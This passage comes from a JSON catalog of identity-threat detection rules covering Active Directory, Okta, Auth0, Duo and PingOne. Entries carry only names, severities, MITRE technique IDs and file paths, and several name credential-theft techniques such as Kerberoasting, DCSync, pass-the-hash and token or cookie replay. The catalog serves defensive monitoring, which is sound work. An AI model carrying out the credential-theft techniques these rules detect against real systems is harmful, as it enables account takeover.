"identity", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-svc-account-mfa-skipped.yaml" }, { "id": "det-identity-074", "type": "detection", "name": "New User Granted Privileged Role <24h After Creation", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'New User Granted Privileged Role <24h After Creation'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "identity", "mitre_techniques": [ "T1098" ], "log_source": "identity", "playbook": "tpl-privilege-escalation", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-onboard-priv-roles-immediate.yaml" }, { "id": "det-identity-075", "type": "detection", "name": "OAuth App Acting As Privileged User", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'OAuth App Acting As Privileged User'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "identity", "mitre_techniques": [ "T1528" ], "log_source": "identity", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-app-impersonation-priv.yaml" }, { "id": "det-identity-076", "type": "detection", "name": "Privileged Role Removed From Many Users In Burst", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Privileged Role Removed From Many Users In Burst'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "identity", "mitre_techniques": [ "T1531" ], "log_source": "identity", "playbook": "tpl-impact", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-priv-role-removed-bulk.yaml" }, { "id": "det-identity-077", "type": "detection", "name": "Service Account With 5+ Active API Keys", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Service Account With 5+ Active API Keys'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "identity", "mitre_techniques": [ "T1098.001" ], "log_source": "identity", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-orphan-svc-acct-many-keys.yaml" }, { "id": "det-identity-078", "type": "detection", "name": "Service Account Key Used From Non-Pipeline IP", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Service Account Key Used From Non-Pipeline IP'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "identity", "mitre_techniques": [ "T1078.004" ], "log_source": "identity", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-svc-account-key-from-non-pipeline.yaml" }, { "id": "det-identity-079", "type": "detection", "name": "Domain Admin Group Membership Added (AD)", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Domain Admin Group Membership Added (AD)'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "identity", "mitre_techniques": [ "T1098.007" ], "log_source": "active-directory", "playbook": "tpl-privilege-escalation", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-domain-admin-added.yaml" }, { "id": "det-identity-080", "type": "detection", "name": "ACL On Sensitive AD Object Modified", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'ACL On Sensitive AD Object Modified'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "identity", "mitre_techniques": [ "T1484.002" ], "log_source": "active-directory", "playbook": "tpl-privilege-escalation", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-ad-acl-sensitive-changed.yaml" }, { "id": "det-identity-081", "type": "detection", "name": "DCSync Rights Granted Outside Domain Controllers", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'DCSync Rights Granted Outside Domain Controllers'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "identity", "mitre_techniques": [ "T1003.006" ], "log_source": "active-directory", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-ad-dcsync-rights-granted.yaml" }, { "id": "det-identity-082", "type": "detection", "name": "Privileged GPO Modified", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Privileged GPO Modified'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "identity", "mitre_techniques": [ "T1484.001" ], "log_source": "active-directory", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-ad-gpo-modified-priv.yaml" }, { "id": "det-identity-083", "type": "detection", "name": "AD Domain Trust Modified", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'AD Domain Trust Modified'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "identity", "mitre_techniques": [ "T1484.002" ], "log_source": "active-directory", "playbook": "tpl-privilege-escalation", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-ad-trust-modified.yaml" }, { "id": "det-identity-084", "type": "detection", "name": "AD Anonymous Logon Allowed Via Null Session", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'AD Anonymous Logon Allowed Via Null Session'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "identity", "mitre_techniques": [ "T1078.001" ], "log_source": "active-directory", "playbook": "tpl-initial-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-ad-userauth-anonymous-named-pipe.yaml" }, { "id": "det-identity-085", "type": "detection", "name": "AD Account Set With PASSWD_NOTREQD", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'AD Account Set With PASSWD_NOTREQD'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "identity", "mitre_techniques": [ "T1098" ], "log_source": "active-directory", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-ad-pwd-not-required.yaml" }, { "id": "det-identity-086", "type": "detection", "name": "Privileged AD Account Set With DONT_EXPIRE_PASSWORD", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Privileged AD Account Set With DONT_EXPIRE_PASSWORD'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "identity", "mitre_techniques": [ "T1098" ], "log_source": "active-directory", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-ad-pwd-never-expires-priv.yaml" }, { "id": "det-identity-087", "type": "detection", "name": "Machine Account Quota Exhausted By Single User", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Machine Account Quota Exhausted By Single User'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "identity", "mitre_techniques": [ "T1136.001" ], "log_source": "active-directory", "playbook": "tpl-persistence", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-ad-machine-account-quota-abuse.yaml" }, { "id": "det-identity-088", "type": "detection", "name": "User Removed From Protected Users Group", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'User Removed From Protected Users Group'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "identity", "mitre_techniques": [ "T1556" ], "log_source": "active-directory", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-ad-protected-users-removed.yaml" }, { "id": "det-identity-089", "type": "detection", "name": "AD sIDHistory Attribute Modified", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'AD sIDHistory Attribute Modified'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "identity", "mitre_techniques": [ "T1078.002" ], "log_source": "active-directory", "playbook": "tpl-privilege-escalation", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-ad-sidhistory-modified.yaml" }, { "id": "det-identity-090", "type": "detection", "name": "Disabled AD Account Authenticated Successfully", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Disabled AD Account Authenticated Successfully'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "identity", "mitre_techniques": [ "T1078.002" ], "log_source": "active-directory", "playbook": "tpl-initial-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-ad-userlogon-disabled-account.yaml" }, { "id": "det-identity-091", "type": "detection", "name": "Kerberoasting: TGS Request With RC4_HMAC", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Kerberoasting: TGS Request With RC4_HMAC'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "identity", "mitre_techniques": [ "T1558.003" ], "log_source": "active-directory", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-kerberoasting-tgs-rc4.yaml" }, { "id": "det-identity-092", "type": "detection", "name": "AS-REP Roasting: TGT Without Pre-Auth", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'AS-REP Roasting: TGT Without Pre-Auth'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "identity", "mitre_techniques": [ "T1558.004" ], "log_source": "active-directory", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-asreproast-no-preauth.yaml" }, { "id": "det-identity-093", "type": "detection", "name": "Golden Ticket Indicator: TGT Lifetime > 10h", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Golden Ticket Indicator: TGT Lifetime > 10h'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "identity", "mitre_techniques": [ "T1558.001" ], "log_source": "active-directory", "playbook": "tpl-persistence", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-golden-ticket-anomalous-tgt-lifetime.yaml" }, { "id": "det-identity-094", "type": "detection", "name": "Silver Ticket Indicator: TGS Without Matching TGT", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Silver Ticket Indicator: TGS Without Matching TGT'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "identity", "mitre_techniques": [ "T1558.002" ], "log_source": "active-directory", "playbook": "tpl-persistence", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-silver-ticket-anomalous-spn.yaml" }, { "id": "det-identity-095", "type": "detection", "name": "Skeleton Key Indicator: Forced Downgrade To DES/RC4", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Skeleton Key Indicator: Forced Downgrade To DES/RC4'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "identity", "mitre_techniques": [ "T1556.001" ], "log_source": "active-directory", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-skeleton-key-encryption-downgrade.yaml" }, { "id": "det-identity-096", "type": "detection", "name": "Kerberos Pre-Auth Failure Spike From Host", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Kerberos Pre-Auth Failure Spike From Host'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "identity", "mitre_techniques": [ "T1110" ], "log_source": "active-directory", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-kerberos-failure-spike-from-host.yaml" }, { "id": "det-identity-097", "type": "detection", "name": "NTLM Authentication With Mismatched WorkstationName", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'NTLM Authentication With Mismatched WorkstationName'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "identity", "mitre_techniques": [ "T1557.001" ], "log_source": "active-directory", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-ntlm-relay-indicator.yaml" }, { "id": "det-identity-098", "type": "detection", "name": "Privileged Account NTLM Logon From Untrusted Host", "description": "AiSOC v1 curated detection. 
Triggers on the identity signal described by 'Privileged Account NTLM Logon From Untrusted Host'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "identity", "mitre_techniques": [ "T1078.002" ], "log_source": "active-directory", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-ntlm-priv-account-from-untrusted.yaml" }, { "id": "det-identity-099", "type": "detection", "name": "Pass-The-Hash Indicator: NTLMv2 With NewCredentials", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Pass-The-Hash Indicator: NTLMv2 With NewCredentials'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "identity", "mitre_techniques": [ "T1550.002" ], "log_source": "active-directory", "playbook": "tpl-lateral-movement", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-pass-the-hash-anomalous-logon.yaml" }, { "id": "det-identity-100", "type": "detection", "name": "Pass-The-Ticket Indicator: TGT Source IP Mismatch", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Pass-The-Ticket Indicator: TGT Source IP Mismatch'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "identity", "mitre_techniques": [ "T1550.003" ], "log_source": "active-directory", "playbook": "tpl-lateral-movement", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-pass-the-ticket-anomalous-tgt-source.yaml" }, { "id": "det-identity-101", "type": "detection", "name": "Session Cookie Replayed From New Geo Within 1h", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Session Cookie Replayed From New Geo Within 1h'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "identity", "mitre_techniques": [ "T1539" ], "log_source": "identity", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-token-theft-cookie-replay.yaml" }, { "id": "det-identity-102", "type": "detection", "name": "OAuth Refresh Token Replayed From Different IP", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'OAuth Refresh Token Replayed From Different IP'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "identity", "mitre_techniques": [ "T1550" ], "log_source": "identity", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-oauth-refresh-token-replay.yaml" }, { "id": "det-identity-103", "type": "detection", "name": "OAuth Access Token Used Before Issue +1s", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'OAuth Access Token Used Before Issue +1s'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "identity", "mitre_techniques": [ "T1550" ], "log_source": "identity", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-oauth-token-theft-impossible-time.yaml" }, { "id": "det-identity-104", "type": "detection", "name": "SAML Assertion Replayed Within Window", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'SAML Assertion Replayed Within Window'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "identity", "mitre_techniques": [ "T1550" ], "log_source": "identity", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-saml-assertion-replay.yaml" }, { "id": "det-identity-105", "type": "detection", "name": "SAML Assertion Issuer Mismatched", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'SAML Assertion Issuer Mismatched'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "identity", "mitre_techniques": [ "T1556" ], "log_source": "identity", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-saml-issuer-mismatch.yaml" }, { "id": "det-identity-106", "type": "detection", "name": "Okta Admin App Assigned To Many Users In Burst", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Okta Admin App Assigned To Many Users In Burst'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "identity", "mitre_techniques": [ "T1098" ], "log_source": "okta", "playbook": "tpl-discovery", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-okta-admin-app-assigned-many-users.yaml" }, { "id": "det-identity-107", "type": "detection", "name": "Okta Policy Allows 'Everyone' Without MFA", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by \"Okta Policy Allows 'Everyone' Without MFA\". Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "identity", "mitre_techniques": [ "T1556" ], "log_source": "okta", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-okta-policy-everyone-bypass-mfa.yaml" }, { "id": "det-identity-108", "type": "detection", "name": "Okta Trusted Network Zone Modified", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Okta Trusted Network Zone Modified'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "identity", "mitre_techniques": [ "T1556" ], "log_source": "okta", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-okta-network-zone-modified-trusted.yaml" }, { "id": "det-identity-109", "type": "detection", "name": "Okta Super Administrator Role Granted", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Okta Super Administrator Role Granted'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "identity", "mitre_techniques": [ "T1098" ], "log_source": "okta", "playbook": "tpl-privilege-escalation", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-okta-superadmin-added.yaml" }, { "id": "det-identity-110", "type": "detection", "name": "Okta Login Marked Suspicious-Activity Behaviour", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Okta Login Marked Suspicious-Activity Behaviour'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "identity", "mitre_techniques": [ "T1078" ], "log_source": "okta", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-okta-suspicious-login-bot.yaml" }, { "id": "det-identity-111", "type": "detection", "name": "Okta App Sign-On Secret Rotated By Non-Admin", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Okta App Sign-On Secret Rotated By Non-Admin'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "identity", "mitre_techniques": [ "T1098.001" ], "log_source": "okta", "playbook": "tpl-persistence", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-okta-app-secret-rotated-priv.yaml" }, { "id": "det-identity-112", "type": "detection", "name": "Okta MFA Factor Reset For Privileged User", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Okta MFA Factor Reset For Privileged User'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "identity", "mitre_techniques": [ "T1556.006" ], "log_source": "okta", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-okta-mfa-factor-reset-priv.yaml" }, { "id": "det-identity-113", "type": "detection", "name": "Okta Sign-On Policy Deactivated", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Okta Sign-On Policy Deactivated'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "identity", "mitre_techniques": [ "T1562.001" ], "log_source": "okta", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-okta-policy-deactivated.yaml" }, { "id": "det-identity-114", "type": "detection", "name": "Okta App Assigned With Federated External Domain", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Okta App Assigned With Federated External Domain'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "identity", "mitre_techniques": [ "T1199" ], "log_source": "okta", "playbook": "tpl-initial-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-okta-app-assigned-foreign-domain.yaml" }, { "id": "det-identity-115", "type": "detection", "name": "Okta API Token Created With Admin Role", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Okta API Token Created With Admin Role'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "identity", "mitre_techniques": [ "T1098.001" ], "log_source": "okta", "playbook": "tpl-persistence", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-okta-api-token-created-priv.yaml" }, { "id": "det-identity-116", "type": "detection", "name": "Okta RADIUS Application Added", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Okta RADIUS Application Added'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "identity", "mitre_techniques": [ "T1133" ], "log_source": "okta", "playbook": "tpl-initial-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-okta-radius-app-added.yaml" }, { "id": "det-identity-117", "type": "detection", "name": "Okta Mass User Deactivation", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Okta Mass User Deactivation'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "identity", "mitre_techniques": [ "T1531" ], "log_source": "okta", "playbook": "tpl-impact", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-okta-mass-deactivate-users.yaml" }, { "id": "det-identity-118", "type": "detection", "name": "Auth0 Rule Added (Custom Code In Login Pipeline)", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Auth0 Rule Added (Custom Code In Login Pipeline)'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "identity", "mitre_techniques": [ "T1556" ], "log_source": "auth0", "playbook": "tpl-persistence", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-auth0-rule-added.yaml" }, { "id": "det-identity-119", "type": "detection", "name": "Auth0 Action Deployed", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Auth0 Action Deployed'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "identity", "mitre_techniques": [ "T1556" ], "log_source": "auth0", "playbook": "tpl-persistence", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-auth0-action-deployed.yaml" }, { "id": "det-identity-120", "type": "detection", "name": "Auth0 Management API Key Created", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Auth0 Management API Key Created'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "identity", "mitre_techniques": [ "T1098.001" ], "log_source": "auth0", "playbook": "tpl-persistence", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-auth0-management-api-key-created.yaml" }, { "id": "det-identity-121", "type": "detection", "name": "Auth0 Connection Deleted", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Auth0 Connection Deleted'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "identity", "mitre_techniques": [ "T1485" ], "log_source": "auth0", "playbook": "tpl-impact", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-auth0-connection-deleted.yaml" }, { "id": "det-identity-122", "type": "detection", "name": "Auth0 Anomaly Detection Disabled", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Auth0 Anomaly Detection Disabled'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "identity", "mitre_techniques": [ "T1562.001" ], "log_source": "auth0", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-auth0-anomaly-detection-disabled.yaml" }, { "id": "det-identity-123", "type": "detection", "name": "Duo Bypass Code Generated", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Duo Bypass Code Generated'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "identity", "mitre_techniques": [ "T1556.006" ], "log_source": "duo", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-duo-bypass-code-generated.yaml" }, { "id": "det-identity-124", "type": "detection", "name": "Duo Policy Changed: MFA Requirement Removed", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Duo Policy Changed: MFA Requirement Removed'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "identity", "mitre_techniques": [ "T1556" ], "log_source": "duo", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-duo-policy-changed-mfa-removed.yaml" }, { "id": "det-identity-125", "type": "detection", "name": "Duo Admin Created Via Self-Service Activation", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Duo Admin Created Via Self-Service Activation'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "identity", "mitre_techniques": [ "T1098" ], "log_source": "duo", "playbook": "tpl-privilege-escalation", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-duo-admin-added-from-self.yaml" }, { "id": "det-identity-126", "type": "detection", "name": "Duo Push Marked As Fraud By User", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Duo Push Marked As Fraud By User'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "identity", "mitre_techniques": [ "T1621" ], "log_source": "duo", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-duo-fraud-reported.yaml" }, { "id": "det-identity-127", "type": "detection", "name": "Duo Application Set To Bypass Policy", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Duo Application Set To Bypass Policy'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "identity", "mitre_techniques": [ "T1556" ], "log_source": "duo", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-duo-application-bypass-policy.yaml" }, { "id": "det-identity-128", "type": "detection", "name": "PingOne MFA Policy Removed", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'PingOne MFA Policy Removed'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "identity", "mitre_techniques": [ "T1556" ], "log_source": "ping", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-ping-policy-mfa-removed.yaml" }, { "id": "det-identity-129", "type": "detection", "name": "PingOne Admin Role Burst Granted", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'PingOne Admin Role Burst Granted'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "identity", "mitre_techniques": [ "T1098" ], "log_source": "ping", "playbook": "tpl-privilege-escalation", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": 